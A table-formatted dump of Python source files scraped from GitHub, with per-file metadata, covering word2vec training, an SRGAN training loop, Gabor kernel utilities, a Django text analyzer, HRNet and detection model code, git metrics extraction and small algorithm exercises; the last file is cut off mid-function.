seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
39666743662 | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 14 20:18:14 2017
@author: user
"""
import csv
import numpy as np
from gensim.models import word2vec
content_POS = list(np.load('all_content_POS.npy'))
"""取出n,a,d,v詞性的詞"""
sentiment_POS = []
sentiment_content = []
ADNV = [1,3,7,13]
for sentence in content_POS:
sen = []
for word in sentence:
if word[1] in ADNV:
sen.append(word)
if len(sen) != 0:
sentiment_POS.append(sen)
"""刪除停用詞"""
print("delete stopword")
stopwordset = set()
with open('stopwords.txt','r',encoding='utf-8') as sw:
stopwordset.add(' ')
for line in sw:
stopwordset.add(line.strip('\n'))
for sentence in sentiment_POS:
temp_sen = []
for word in sentence:
if word[0] not in stopwordset:
temp_sen.append(word[0])
sentiment_content.append(temp_sen)
f = open('sentiment_content.txt', 'w', encoding='utf-8')
spamwriter = csv.writer(f, lineterminator = '\n', delimiter=' ', quoting = csv.QUOTE_NONE)
spamwriter.writerows(sentiment_content)
f.close()
"""訓練詞向量"""
print("train word2vec")
sentences = word2vec.Text8Corpus('sentiment_content.txt')
model = word2vec.Word2Vec(sentences, size=250) # default sg = 0, use CBOW, hs = 0, use negative smapling
model.save_word2vec_format(u'med250.model.bin', binary=True)
"""bin檔轉txt,讀單詞向量"""
model = word2vec.Word2Vec.load_word2vec_format('med250.model.bin', binary=True)
model.save_word2vec_format('med250.model.txt', binary=False)
word_list = []
vec_list = []
f = open('med250.model.txt','r',encoding = 'utf-8')
for r,row in enumerate(csv.reader(f)):
if r==0:
line = row[0].split(' ')
total_num = int(line[0])
vec_len = int(line[1])
#np.save('total_num',total_num)
else:
line = row[0].split(' ')
word = line[0]
vec = []
for v in line[1:250]:
vec.extend([float(v)])
word_list.extend([word])
vec_list.append(vec)
np.save('word_list',word_list)
np.save('vec_list',vec_list)
f.close()
# word_vec = [list(np.load('word_list.npy')),np.load('vec_list.npy')]
| Maomaomaoing/Sacasm-Detection | 2.word2vector_pre.py | 2.word2vector_pre.py | py | 2,254 | python | en | code | 0 | github-code | 36 |
5491251302 | import sys
import os
sys.path.append(os.path.abspath('.'))
import torch
import utils as ut
from train import *
from dataset import load_train_data, load_test_data
import constants
def main(config):
# Fixed random number seed
torch.manual_seed(config.seed)
torch.cuda.manual_seed_all(config.seed)
# Initialize image evaluation metrics
best_psnr = 0.0
best_ssim = 0.0
if config.train.checkpoint.is_log:
ut.log_on_train_start(log_name=config.exp_name, config=config)
checkpoint_dir = os.path.join(constants.ROOT, 'model', config.exp_name)
ut.create_dir(checkpoint_dir)
# Define basic elements for training
netG, netD = define_model(config)
# optimG = define_optimizer(netG, config)
# optimD = define_optimizer(netD, config)
optimG = optim.Adam(netG.parameters(),
lr=config.train.optim.lr,
betas=config.train.optim.betas)
optimD = optim.Adam(netD.parameters(),
lr=config.train.optim.lr,
betas=config.train.optim.betas)
schedulerG = define_scheduler(optimG, config)
schedulerD = define_scheduler(optimD, config)
if config.train.checkpoint.load_model:
G_state_dict, optimG_state_dict, start_epoch = ut.load_checkpoint(config.train.checkpoint.gen)
D_state_dict, optimD_state_dict, start_epoch = ut.load_checkpoint(config.train.checkpoint.disc)
netG.load_state_dict(G_state_dict)
netD.load_state_dict(D_state_dict)
optimG.load_state_dict(optimG_state_dict)
optimD.load_state_dict(optimD_state_dict)
# Loss function
content_criteria = nn.MSELoss()
adversarial_criteria = nn.BCEWithLogitsLoss()
feature_extractor = VGGLoss()
feature_extractor = feature_extractor.to(constants.DEVICE)
feature_extractor.eval()
# Data loader
print("Loading data ...")
train_loader = load_train_data(root=config.train.dataset.data_dir, batch_size=config.train.hyp.batch_size)
test_loader = load_test_data(hr_root=config.test.dataset.hr_dir, lr_root=config.test.dataset.lr_dir)
print("Finish loading data")
for epoch in range(config.train.hyp.num_epoch):
netG.train()
netD.train()
D_loss, G_loss = train(
train_loader,
epoch,
netG,
netD,
optimG,
optimD,
content_criteria,
adversarial_criteria,
feature_extractor,
config)
schedulerD.step()
schedulerG.step()
psnr, ssim = test(test_loader, netG)
is_best = psnr > best_psnr and ssim > best_psnr
best_psnr = max(psnr, best_psnr)
best_ssim = max(ssim, best_ssim)
print("D_loss: %.6f, G_loss: %.6f, psnr: %.6f, ssim: %.6f" % (D_loss, G_loss, psnr, ssim))
ut.save_checkpoint(
{
"epoch": epoch + 1,
"model": netD.state_dict(),
"optimizer": optimD.state_dict(),
},
f'{checkpoint_dir}/disc_{epoch+1}.pth.tar',
f'{checkpoint_dir}/disc_best.pth.tar',
is_best)
ut.save_checkpoint(
{
"epoch": epoch + 1,
"model": netG.state_dict(),
"optimizer": optimG.state_dict(),
},
f'{checkpoint_dir}/gen_{epoch+1}.pth.tar',
f'{checkpoint_dir}/gen_best.pth.tar',
is_best)
if __name__ == '__main__':
main_config = ut.read_config(os.path.join(constants.ROOT,'config/config.yaml'))
main(main_config)
| daoduyhungkaistgit/SRGAN | src/main.py | main.py | py | 3,641 | python | en | code | 3 | github-code | 36 |
38164677251 | import math
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import gridspec
from scipy.special import factorial
from plot.plot_data import plot_matrixImage
def normalize(X):
f_min, f_max = X.min(), X.max()
return (X - f_min) / (f_max - f_min)
def gabor_kernel_2(frequency, sigma_x, sigma_y, theta=0, offset=0, ks=61):
w = np.floor(ks / 2)
y, x = np.mgrid[-w:w + 1, -w:w + 1]
rotx = x * np.cos(theta) + y * np.sin(theta)
roty = -x * np.sin(theta) + y * np.cos(theta)
g = np.zeros(y.shape)
g[:] = np.exp(-0.5 * (rotx ** 2 / sigma_x ** 2 + roty ** 2 / sigma_y ** 2))
g /= 2 * np.pi * sigma_x * sigma_y
g *= np.cos(2 * np.pi * frequency * rotx + offset)
return g
def gabor_kernel_3(frequency, x_c, y_c, sigma_x, sigma_y, theta=0, offset=0, ks=61, scale=1):
w = np.floor(ks / 2)
y, x = np.mgrid[-w:w + 1, -w:w + 1]
rotx = (x - x_c) * np.cos(theta) + (y - y_c) * np.sin(theta)
roty = -(x - x_c) * np.sin(theta) + (y - y_c) * np.cos(theta)
g = np.zeros(y.shape)
g[:] = np.exp(-0.5 * (rotx ** 2 / sigma_x ** 2 + roty ** 2 / sigma_y ** 2))
g /= 2 * np.pi * sigma_x * sigma_y
g *= np.cos(2 * np.pi * frequency * rotx + offset)
return g * scale
def poisson(k, lamb):
"""poisson pdf, parameter lamb is the fit parameter"""
return (lamb ** k / factorial(k)) * np.exp(-lamb)
def negLogLikelihood(params, data):
""" the negative log-Likelohood-Function"""
lnl = - np.sum(np.log(poisson(data, params[0])))
return lnl
# def tfm_poisson_pdf(x, mu):
# y, J = transformation_and_jacobian(x)
# # For numerical stability, compute exp(log(f(x)))
# return np.exp(y * np.log(mu) - mu - gammaln(y + 1.)) * J
def plot_conv_weights(weights, model_name):
length = weights.shape[0] * weights.shape[2]
matrix = np.zeros([length, 0])
for i in range(0, weights.shape[0]):
row = np.empty([0, weights.shape[2]])
for j in range(0, weights.shape[1]):
row = np.concatenate((row, weights[i, j]), axis=0)
# f_min, f_max = np.min(row), np.max(row)
# row = (row - f_min) / (f_max - f_min)
# row[0,0] = 0
matrix = np.concatenate((matrix, row), axis=1)
# matrix[0,0] = 1
f_min, f_max = np.min(matrix), np.max(matrix)
matrix = (matrix - f_min) / (f_max - f_min)
plot_matrixImage(matrix, 'weights_' + model_name)
def plot_weights(weights, model_name, gs=None, name=None):
show = False
if gs is None:
plt.figure(figsize=(10, 2), frameon=False)
inner = gridspec.GridSpec(weights.shape[0], weights.shape[1], wspace=0.2, hspace=0.2)
show = True
else:
inner = gridspec.GridSpecFromSubplotSpec(weights.shape[0], 8,
subplot_spec=gs, wspace=0.1, hspace=0.1)
# gs = gridspec.GridSpec(, width_ratios=[1] * weights.shape[1],
# wspace=0.5, hspace=0.5, top=0.95, bottom=0.05, left=0.1, right=0.95)
idx = 0
for i in range(0, weights.shape[0]):
for j in range(0, weights.shape[1]):
kernel1 = weights[i, j]
ax_ = plt.subplot(inner[i, j])
ax_.set_xticks([])
ax_.set_yticks([])
ax_.set_axis_off()
ax_.imshow(kernel1, cmap='gray')
#
idx += 1
if j == 0:
ax_.set_title(name, pad=10, weight='semibold', size=16)
if show:
plt.tight_layout()
plt.savefig(f'weights_{model_name}.png')
plt.show()
def show_kernels(weights, func_name, gs=None):
number = math.ceil(math.sqrt(weights.shape[0]))
img = np.transpose(weights, (0, 2, 3, 1))
idx = 0
show = False
if gs is None:
plt.figure(figsize=(10, 10))
inner = gridspec.GridSpec(1, weights.shape[0], wspace=0.2, hspace=0.2)
show = True
else:
inner = gridspec.GridSpecFromSubplotSpec(1, 8,
subplot_spec=gs, wspace=0.1, hspace=0.1)
# fig, axes = pyplot.subplots(ncols=weights.shape[0], figsize=(20, 4))
for j in range(weights.shape[0]): # in zip(axes, range(weights.shape[0])):
# for i in range(number):
ax_ = plt.subplot(inner[idx])
ax_.set_xticks([])
ax_.set_yticks([])
ax_.set_axis_off()
# ax.set_title(f'Kernel {idx}', pad=3)
# imgs = img[range(j*8, (j*8)+number)]
channel = img[idx]
f_min, f_max = channel.min(), channel.max()
channel = (channel - f_min) / (f_max - f_min)
ax_.imshow(channel)
if j == 0:
ax_.set_title(func_name, pad=10, weight='bold', size=18)
idx += 1
if show:
plt.tight_layout()
plt.savefig(f'kernels_{func_name}.png')
plt.show()
def similarity(m1, m2):
sum = 0
for i in range(m1.shape[0]):
for j in range(m1.shape[1]):
sum += np.abs(m1[i, j] - m2[i, j])
return sum / (m1.shape[0] * m1.shape[1])
| franzigeiger/training_reductions | utils/gabors.py | gabors.py | py | 5,020 | python | en | code | 3 | github-code | 36 |
18550396896 | from django.http import HttpResponse
from django.shortcuts import render
def index(request):
#params = {'name':'Tarbi'}
return render(request,"index.html")
def analyze(request):
#Get the text
djtext = request.POST.get('text','default')
#Operations
removepunc = request.POST.get('removepunc','default')
fullcaps = request.POST.get('fullcaps','default')
count = request.POST.get('count','default')
newlineremover = request.POST.get('newlineremover','default')
spaceremover = request.POST.get('spaceremover','default')
#Result text
analyzed = ""
if removepunc == "on":
punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
analyzed = ""
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
params = {'purpose': 'Remove Punctuations', 'analyzed_text': analyzed,'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if fullcaps == "on":
analyzed = djtext.upper()
params = {'purpose': 'To Upper Case', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if count == "on":
cnt = 0
analyzed = ""
for x in djtext:
if(x.isdigit()):
continue
analyzed+=x
params = {'purpose': 'Number Remover', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if newlineremover == "on":
analyzed = ""
for x in djtext:
if x != '\n' and x!='\r':
analyzed+=x
params = {'purpose': 'New Line Remove', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if spaceremover =="on":
analyzed =""
for x in djtext:
if(x!=' '):
analyzed+=x
params = {'purpose': 'Space Remove', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
if spaceremover !="on" and newlineremover != "on" and count != "on" and fullcaps != "on" and removepunc != "on":
return HttpResponse("Select any option and try again")
return render(request, 'analyze.html', params)
def about(request):
return render(request, 'about.html')
def contact(request):
return render(request, 'contact.html')
| Bibhash7/Textlyzer | mysite/views.py | views.py | py | 2,508 | python | en | code | 0 | github-code | 36 |
17653061247 | import numpy as np
from inet.models.solvers.tf_lite import MultiTaskModel
from inet.models.tf_lite.tflite_methods import evaluate_interpreted_model
class TwoStageModel(MultiTaskModel):
"""
Object detection model using dependent/sequential methods to solve the localization and classification tasks.
A regressor predicts the location, the original input image gets cropped to a patch containing the extracted
Bounding Box. Afterwards a classifier predicts the class label, based on the cropped input.
[Similar to `IndependentModel`]
Example:
>>> from tensorflow.keras.applications.mobilenet import MobileNet
>>> from inet.models.architectures.classifier import Classifier
>>> from inet.models.architectures.bounding_boxes import BoundingBoxRegressor
>>> clf_backbone = MobileNet(weights='imagenet', include_top=False, input_shape=(224, 224))
>>> reg_backbone = MobileNet(weights='imagenet', include_top=False, input_shape=(224, 224))
>>> regressor = BoundingBoxRegressor(reg_backbone)
>>> classifier = Classifier(clf_backbone)
>>> solver = TwoStageModel(regressor, classifier, (224, 224, 3), False)
"""
## Name of model architecture
model_name = 'two-stage-model'
def predict(self, X):
"""
Performs dependent predictions on input `X`.
Regressor receives raw `X` -> returns `c`
`X` is cropped using `c` -> `X_hat`
Classifier receives `X_hat` -> returns `y`
:param X: vector of input images
:return: Prediction Tuple [y, c]
"""
if self.is_tflite:
bbs = evaluate_interpreted_model(self.regressor, X)
bbs = np.array(bbs).reshape((len(bbs), -1))
else:
bbs = self.regressor.predict(X)
cropped_images = np.array([i for i in map(self.crop_image, zip(X.copy(), bbs.copy()))])
if self.is_tflite:
clf = evaluate_interpreted_model(self.classifier, cropped_images)
clf = np.array(clf).reshape((len(clf), -1))
return np.c_[clf, bbs]
classifications = self.classifier.predict(cropped_images)
return np.c_[classifications, bbs]
| philsupertramp/inet | inet/models/solvers/two_stage.py | two_stage.py | py | 2,210 | python | en | code | 0 | github-code | 36 |
12678425581 | import csv
from dateutil.parser import parse
from decimal import *
import pandas as pd
import gc
import os
from multiprocessing import Process
def intersection(list1, list2):
res = []
idx1 = 0
while idx1 < len(list1):
if list1[idx1] in list2:
res.append(list1[idx1])
idx1 += 1
return res
def get_project_info():
snapshot_id = 60295045
one_day = 86400
one_week = 604800
one_month = 2628000
cnt = 0
min_date = 1165524100
total_commits = 0
authors = []
daily_cnt = 1
daily_commits = []
daily_contributors = []
daily_temp_contrib = []
weekly_cnt = 1
weekly_commits = []
weekly_contributors = []
weekly_temp_contrib = []
monthly_cnt = 1
monthly_commits = []
monthly_contributors = []
monthly_temp_contrib = []
for lines in pd.read_csv('/home/sv/big_snapshot_.csv', encoding='utf-8', header=None, chunksize=1000000):
for line in lines.iterrows():
author = int(line[1][1])
date = int(line[1][0])
cnt += 1
print(cnt)
total_commits += 1
if author not in authors:
authors.append(author)
#daily
if author not in daily_contributors and date <= min_date + one_day:
daily_contributors.append(author)
if date <= min_date + one_day*daily_cnt:
if author not in daily_temp_contrib:
daily_temp_contrib.append(author)
else:
daily_contributors = intersection(daily_contributors, daily_temp_contrib)
daily_temp_contrib = []
daily_cnt += 1
while date > min_date + one_day*daily_cnt:
daily_commits.append(0)
daily_contributors = []
daily_cnt += 1
daily_temp_contrib.append(author)
daily_commits.append(1)
#weekly
if author not in weekly_contributors and date <= min_date + one_week:
weekly_contributors.append(author)
if date <= min_date + one_week*weekly_cnt:
if author not in weekly_temp_contrib:
weekly_temp_contrib.append(author)
else:
weekly_contributors = intersection(weekly_contributors, weekly_temp_contrib)
weekly_temp_contrib = []
weekly_cnt += 1
while date > min_date + one_week*weekly_cnt:
weekly_commits.append(0)
weekly_contributors = []
weekly_cnt += 1
weekly_temp_contrib.append(author)
weekly_commits.append(1)
#monthly
if author not in monthly_contributors and date <= min_date + one_month:
monthly_contributors.append(author)
if date <= min_date + one_month*monthly_cnt:
if author not in monthly_temp_contrib:
monthly_temp_contrib.append(author)
else:
monthly_contributors = intersection(monthly_contributors, monthly_temp_contrib)
monthly_temp_contrib = []
monthly_cnt += 1
while date > min_date + one_month*monthly_cnt:
monthly_commits.append(0)
monthly_contributors = []
monthly_cnt += 1
monthly_temp_contrib.append(author)
monthly_commits.append(1)
#writing to file
daily_freq = Decimal(sum(daily_commits))/Decimal(len(daily_commits))
weekly_freq = Decimal(sum(weekly_commits))/Decimal(len(weekly_commits))
monthly_freq = Decimal(sum(monthly_commits))/Decimal(len(monthly_commits))
df = pd.DataFrame({
'snapshot_id': [snapshot_id],
'total_commits': [total_commits],
'total_authors': [len(authors)],
'daily_freq': [daily_freq],
'daily_contributors': [len(daily_contributors)],
'weekly_freq': [weekly_freq],
'weekly_contributors': [len(weekly_contributors)],
'monthly_freq': [monthly_freq],
'monthly_contributors': [len(monthly_contributors)]
})
df.to_csv('/home/sv/project-git-metrics-first.csv', mode = 'a', header = False, index = False)
if __name__ == '__main__':
get_project_info() | nghiahhnguyen/SWHGD | odoo_extract_metrics.py | odoo_extract_metrics.py | py | 4,481 | python | en | code | 1 | github-code | 36 |
39883705611 | import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
h, k_up1, k_up2 = np.loadtxt('./Reactions/Kup.dat',skiprows=3,usecols=(1,5799+1,5800+1),unpack=True)
h *= 1e-5
k_up = k_up1 + k_up2
plt.xscale('log')
plt.plot(k_up,h,'k-')
plt.savefig('./N2O-rates.pdf',bbox_inches='tight')
| aheays/spectr_examples | argo/data/early_earth/out/plot-k.py | plot-k.py | py | 320 | python | en | code | 0 | github-code | 36 |
18482571232 | import math
import torch.nn as nn
class HRNET_NECK(nn.Module):
def __init__(self, in_channels, feature_size=256):
super(HRNET_NECK, self).__init__()
C2_size, C3_size, C4_size, C5_size = in_channels
# P2
self.P2_1 = nn.Conv2d(C2_size, feature_size, kernel_size=1, stride=1, padding=0)
self.P2_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# P3
self.P3_1 = nn.Conv2d(C3_size, feature_size, kernel_size=1, stride=1, padding=0)
self.P3_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# P4
self.P4_1 = nn.Conv2d(C4_size, feature_size, kernel_size=1, stride=1, padding=0)
self.P4_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# P5
self.P5_1 = nn.Conv2d(C5_size, feature_size, kernel_size=1, stride=1, padding=0)
# "P6 is obtained via a 3x3 stride-2 conv on C5"
self.P6 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# "P6 is computed by applying ReLU followed by a 3x3 stride-2 conv on P6"
self.P7_1 = nn.ReLU()
self.P7_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def forward(self, inputs):
C2, C3, C4, C5 = inputs
P2_x = self.P2_1(C2)
P2_downsample = self.P2_2(P2_x)
P3_x = self.P3_1(C3)
P3_x = P2_downsample + P3_x
P3_downsample = self.P3_2(P3_x)
P4_x = self.P4_1(C4)
P4_x = P4_x + P3_downsample
P4_downsample = self.P4_2(P4_x)
P5_x = self.P5_1(C5)
P5_x = P5_x + P4_downsample
P6_x = self.P6(P5_x)
P7_x = self.P7_1(P6_x)
P7_x = self.P7_2(P7_x)
return [P3_x, P4_x, P5_x, P6_x, P7_x]
| TWSFar/FCOS | models/necks/hrnet_neck.py | hrnet_neck.py | py | 2,155 | python | en | code | 1 | github-code | 36 |
5675989650 | import sys
input = sys.stdin.readline
n = int(input())
graph = []
move = [[-1, 0], [1, 0], [0, -1], [0, 1]]
ans = []
number = 0
for _ in range(n):
graph.append([int(i) for i in (input().strip())])
def dfs(x, y, initial):
global cnt
cnt = initial
graph[x][y] = 0
for i in move:
next_x = x + i[0]
next_y = y + i[1]
if 0 <= next_x < n and 0 <= next_y < n and graph[next_x][next_y] == 1:
cnt += 1
dfs(next_x, next_y, cnt)
for x in range(n):
for y in range(n):
if graph[x][y] == 1:
dfs(x, y, 1)
number += 1
ans.append(cnt)
print(number)
print("\n".join(str(i) for i in sorted(ans))) | origin1508/algorithm | 백준/Silver/2667. 단지번호붙이기/단지번호붙이기.py | 단지번호붙이기.py | py | 707 | python | en | code | 0 | github-code | 36 |
70280734825 | """
String reversing. What could be simpler?
Usage:
python string_reverse.py <string_to_reverse>
"""
import sys
def string_reverse(input_string):
result = ''
for i in input_string:
result = i + result
return result
if __name__ == '__main__':
if len(sys.argv) < 2:
sys.stderr.write('This util needs some input: ./string_reverse.py string_to_reverse\n')
sys.exit()
input_string = sys.argv[1]
if len(sys.argv) > 2:
sys.stderr.write('Warning: the second and the following arguments ignored\n')
sys.stdout.write('Initial string: {}\n'.format(input_string))
sys.stdout.write('Reversed string: {}\n'.format(string_reverse(input_string))) | AlexDobrushskiy/testing | string_reverse.py | string_reverse.py | py | 699 | python | en | code | 0 | github-code | 36 |
8860920055 | from collections import defaultdict
import Policy as policy
import random
import numpy as np
import matplotlib.pyplot as plt
# import pytorch as torch
class Agent:
def __init__(self, env) -> None:
self.env = env
# replay_buffer = {(state, action) : (state_, reward)}
self.replay_buffer = defaultdict(lambda : tuple(list, float))
# visisted_states = {state}
self.visisted_states = set()
self.state = self.env.reset()
# Decide an action from a given state
# Returns True if the environment is done (won or lost)
def next(self) -> bool:
return False
# Shallow agent for discrete environments or continuous environments with a small state space
class ShallowAgent(Agent):
def __init__(self, env) -> None:
super().__init__(env)
# self.v = {state : value}
self.V = defaultdict(lambda : 0)
# self.q = {(state, action) : value}
self.Q = defaultdict(lambda : 0)
# Deep agent for continuous environments or discrete environments with a large state space
class DeepAgent(Agent):
def __init__(self, env, weight_size) -> None:
super().__init__(env)
# self.w = torch.rand(weight_size)
class DiscreteQLearningAgent(Agent):
def __init__(self, env) -> None:
super().__init__(env)
class DiscreteActionValueIterationAgent(Agent):
def __init__(self, env, policy = policy.random) -> None:
super().__init__(env)
self.policy = policy
def next(self) -> bool:
# Action value iteration function
q = defaultdict(lambda : 0)
for state in self.env.get_states():
for action in self.env.A(state):
trans_prob = self.env.get_transistion_probabilities(state, action)
temp = 0
for next_state, reward in trans_prob:
pi = self.policy(self.env, next_state, self.q)
temp += trans_prob[(next_state, reward)]*(reward + 0.99*sum([pi[action_] * self.q[(next_state,action_)] for action_ in self.env.A(next_state)]))
q[(state,action)] = temp
self.q = q
# Value iteration function
v = defaultdict(lambda : 0)
for state in self.env.get_states():
actions = self.env.A(state)
for action in actions:
pi = 1/len(actions)
temp = 0
trans_prob = self.env.get_transistion_probabilities(state, action)
# Get reward, next state
for next_state, reward in trans_prob.keys():
temp += trans_prob[(next_state,reward)]*(reward + 0.99*self.v[next_state])
pi = self.policy(self.env, state, self.q)
v[state] += pi[action] * temp
self.v = v
return True
class ManualAgent(Agent):
def __init__(self, env) -> None:
super().__init__(env)
def next(self):
while(True):
print("Current state: " + str(self.env.state))
print("Total reward: " + str(self.env.get_accumulative_reward(self)))
print("---------------")
print("Enter next action")
print("Avaliable actions: " + str(self.env.A(self.state)))
try:
action = input()
if action == "exit":
return False
action = int(action)
print("\n")
if(action <= self.env.A(self.state)[-1]):
next_state, reward = self.env.step(self.state, action)
self.state = next_state
self.visited_states.append(self.state)
self.previous_actions.append(action)
self.obtained_rewards.append(reward)
print("---------------")
print("Reward: " + str(reward))
print("---------------")
return True
else:
print("Invalid action")
except ValueError:
print("The provided string is not a valid representation of an integer.\n"+
"Please enter a valid integer in the action space")
| TheGoldenChicken/robust-rl | rl/agent.py | agent.py | py | 4,660 | python | en | code | 0 | github-code | 36 |
35938489743 | COUNT=0
count2=0
#history=[1,1,0,0]
def q1(history):
def perm(n,begin,end):
global COUNT
global count2
if begin>=end:
for i in range(0, end):
if n[i]==n[i-1]:
count2+=1
# print(n)
break#manage test statistic
#print (n)
COUNT +=1
else:
i=begin
for num in range(begin,end):
n[num],n[i]=n[i],n[num]
perm(n,begin+1,end)
n[num],n[i]=n[i],n[num]
perm(history, 0, len(history))
p_value=float(count2)/float(COUNT)
print('the p value is: ')
print(p_value)
return p_value
history=[1,0,0,1]
q1(history)
#perm(n,0,len(n))
#print (COUNT)
#print(count2)
| Ca11me1ce/Funny-Programming | AI-Decision-Making/py_sand/pass_test_q1_1.py | pass_test_q1_1.py | py | 734 | python | en | code | 2 | github-code | 36 |
30569760677 | from typing import List, Tuple
def create_adjacent_list(edges):
adjacent_list = dict()
for edge in edges:
if adjacent_list.get(edge[0]):
adjacent_list[edge[0]].append(edge[1])
else:
adjacent_list[edge[0]] = [edge[1]]
return adjacent_list
def solution(n: int, m: int, edges: List[Tuple[int, int]]):
adjacents_list = create_adjacent_list(edges)
for i in range(1, n + 1):
temp = [0] * n
if adjacents_list.get(i):
vertex = adjacents_list.get(i)
for v in vertex:
temp[v - 1] = 1
print(' '.join(map(str, temp)))
def input_data():
n, m = map(int, input().strip().split())
rows = m
edges = list()
while rows:
edges.append(tuple(map(int, input().strip().split())))
rows -= 1
return n, m, edges
if __name__ == '__main__':
solution(*input_data())
"""
5 3
1 3
2 3
5 2
"""
| fenixguard/yandex_algorithms | sprint_6/B.exchange_edges_list_to_adjacent_list.py | B.exchange_edges_list_to_adjacent_list.py | py | 935 | python | en | code | 2 | github-code | 36 |
31418095220 | from Word2Vec.Word2VecGenerator import Word2VecGenerator
import glob
from JsonParse.JsonParser import JsonParser
import json as Json
class TrainingComponentGenerator:
__largest_n_words = 0
__astNode2Vec_size = 0
__number_of_vector_code2vec = 0
def __init__(self, astNode2Vec_size, number_of_vector_code2vec):
self.__astNode2Vec_size = astNode2Vec_size
self.__number_of_vector_code2vec = number_of_vector_code2vec
def generateTrainingComponent(self, dataFolderPath):
dataset = []
for file in glob.glob(dataFolderPath):
dataset.append(file)
commits = list()
parser = JsonParser()
for data in dataset:
json = parser.openJson(data)
commitData = json
commits.extend(commitData)
astSentences = list()
sourceCodeSentences = list()
astNodeDict = list()
for commit in commits:
self.__collectWord2VecData(commit, sourceCodeSentences, astSentences, astNodeDict)
self.__word2vecModelGenerate(sourceCodeSentences, astSentences)
astNodeDictSet = set(astNodeDict) # convert it as set data type.
astNodeDict = list(astNodeDictSet)
jsonString = Json.dumps(astNodeDict)
with open('Outcome/Models/AstNodeDictionary.json', 'w') as f:
f.write(jsonString)
print("Training Components are built")
def __collectWord2VecData(self, commit, sourceCodeSentences, astSentences, astNodeDict):
tasks = commit['tasks']
commitAstNodeDic = commit['astNodeDic']
astNodeDict.extend(commitAstNodeDic)
for task in tasks:
taskElementTreeSet = task['taskElementTreeSet']
for taskElement in taskElementTreeSet:
astNodeSentence = taskElement['astNodeSentence']
astNodeSenAsList = self.__stringToList(astNodeSentence)
astSentences.append(astNodeSenAsList)
sourceCode = taskElement['sourceCode']
sourceCodeAsList = self.__tokenizedCodes(sourceCode)
sourceCodeSentences.append(sourceCodeAsList)
if (self.__largest_n_words < len(sourceCodeAsList)):
self.__largest_n_words = len(sourceCodeAsList)
def __word2vecModelGenerate(self, sourceCodeSentences, astSentences):
# CODE2VEC
code2Vec = Word2VecGenerator()
code2Vec.generateModel(sourceCodeSentences, vector_size=self.__number_of_vector_code2vec, window=4, min_count=1,
Type='CodeType')
print("Code2Vec is generated")
# AST2Vec
astNode2Vec = Word2VecGenerator()
astNode2Vec.generateModel(astSentences, vector_size=self.__astNode2Vec_size, window=2, min_count=1,
Type="AstType")
print("AST2Vec is generated")
return astNode2Vec, code2Vec
def __stringToList(self, string):
listRes = list(string.split(" "))
return listRes
def __tokenizedCodes(self, sourceCode):
sourceCodeAsList = self.__stringToList(sourceCode)
sourceCodeAsList = [x for x in sourceCodeAsList if x != '']
return sourceCodeAsList
def getMaximumNumberOfWord(self):
return self.__largest_n_words
| ZzillLongLee/TsGen | TrainingDataGenerator/TrainingComponentGenerator.py | TrainingComponentGenerator.py | py | 3,300 | python | en | code | 0 | github-code | 36 |
36403224897 | from project.Util.EMFAttributes import EMFAttributes
from project.Util.finalWrite import finalWrite
class FileInput:
filePath = ''
def readFile(self):
while True:
path = '/Users/shubhamjain/CS562/project/examples/example5'
# path += input('Input the File Name with its path\n')
try:
file = open(path, "r")
if file:
break
except (Exception, FileExistsError) as error:
print("Error while fetching data from file", error)
return file
def InputFile(self):
print("Input File")
attr = EMFAttributes()
file = self.readFile()
selectAttributes = []
if file.readline().lower().__contains__('select'):
selectAttributes =''
selectAttributes += file.readline()
selectAttributes = selectAttributes.strip().replace(' ',' ').split(',')
for idx,selectAtt in enumerate(selectAttributes):
selectAttributes[idx] = selectAtt.replace(',', '').replace(' ', '')
if not selectAttributes[idx].isalpha():
selectAttributes[idx] = selectAtt.replace(',','').replace(' ','')
if not selectAttributes[idx].__contains__('_'):
print("You got trouble in select Attribute", selectAtt)
n = 0
if file.readline().lower().__contains__('variable'):
n = int(file.readline().replace(' ',''))
groupAttributes = []
if file.readline().lower().__contains__('attributes'):
groupAttributes = ''
groupAttributes += file.readline()
groupAttributes = groupAttributes.strip().replace(',', ' ').replace(' ', ' ').split(' ')
for idx, groupAtt in enumerate(groupAttributes):
if not groupAtt.isalpha():
groupAttributes[idx] = groupAtt.replace(',', '').replace(' ', '')
if not groupAttributes[idx].__contains__('_'):
print("You got trouble in group Attribute", groupAtt)
# print(groupAttributes)
f_vect = []
if file.readline().lower().__contains__('vect'):
f_vect = ''
f_vect += file.readline()
f_vect = f_vect.strip().replace(',', ' ').replace(' ', ' ').split(' ')
for idx, vect in enumerate(f_vect):
if not vect.isalpha():
f_vect[idx] = vect.replace(',', '').replace(' ', '')
if not f_vect[idx].__contains__('_'):
print("You got trouble in f-vect Attribute", vect)
select = []
if file.readline().lower().__contains__('select'):
while True:
conditions = []
temp = file.readline()[:-1]
if temp.lower().__contains__('having'):
break
temp = temp.split('and')
